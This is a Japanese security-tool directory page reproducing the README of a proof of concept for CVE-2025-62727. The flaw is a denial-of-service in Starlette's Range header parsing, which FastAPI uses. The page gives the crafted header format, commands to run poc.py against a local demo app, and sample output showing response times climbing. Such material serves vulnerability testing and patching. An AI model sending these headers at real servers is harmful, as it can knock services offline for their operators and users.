Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-62727-Demo — CVE-2025-62727の概念実証で、FastAPI(基盤となるStarlette <= 0.48.0)にサービス拒否を引き起こす可能性があります。 | Kitploit
ツール/GitHubGitHub/ch4n3-yoon/cve-2025-62727-demo
脆弱性分析エクスプロイトウェブセキュリティAPIセキュリティ
GitHubch4n3-yoon/cve-2025-62727-demo

CVE-2025-62727-Demo

CVE-2025-62727の概念実証で、FastAPI(基盤となるStarlette <= 0.48.0)にサービス拒否を引き起こす可能性があります。

リポジトリを見る
12411ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-62727 デモ

被害者アプリの説明

CVE-2025-62727 の対象となる被害者は、以下の機能を持つシンプルな FastAPI アプリです:

  • / で Hello World を返します。
  • Starlette の StaticFiles を使用して /static 配下の静的ファイルを配信します。
  • 起動時に A を N 回繰り返したテキストファイルを自動生成します(N は 1024, 2048, 50176)。

被害者アプリの実行方法

  1. (任意)virtualenv を作成して有効化します。

  2. 依存関係をインストールします:

    pip install -r requirements.txt
    
  3. サーバーを起動します:

    uvicorn main:app --reload
    
  4. ブラウザで開きます:

  • http://127.0.0.1:8000/ でインデックスページを表示。
  • http://127.0.0.1:8000/static/1024.txt などで静的ファイルを表示。

注意事項

  • 静的ファイルはアプリ起動時に static/ ディレクトリ配下に生成されます。既存のファイルは上書きされません。
  • 静的ファイル配信には、指定どおり Starlette の StaticFiles を使用しています。

PoC: CVE-2025-62727(Range ヘッダー解析)

同梱の poc.py は、/static ルート経由で bytes=000...000a- 形式の細工されたヘッダーを使用し、Starlette の FileResponse における CPU 負荷の高い Range 解析を引き起こします。

サーバーを起動したら、別のシェルで以下を実行します:

python3 poc.py --sizes 1000,2000,4000,7000

ターゲット URL を上書きする場合(任意):

python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000

注意事項:

  • PoC はデフォルトで http://127.0.0.1:8000/static/50176.txt(アプリが生成するファイル)をターゲットにします。変更する場合は --url を使用してください。
  • 400/431(ヘッダーが大きすぎる)が発生する場合は --sizes を小さく調整し、ヘッダーが成功してより強い効果を得たい場合は大きく調整してください。

実行結果の例:

$ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
[INFO] Target: http://127.0.0.1:8000/static/50176.txt
[MODE] regex (header = 'bytes=' + '0'*N + 'a-')
N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
ツールをダウンロード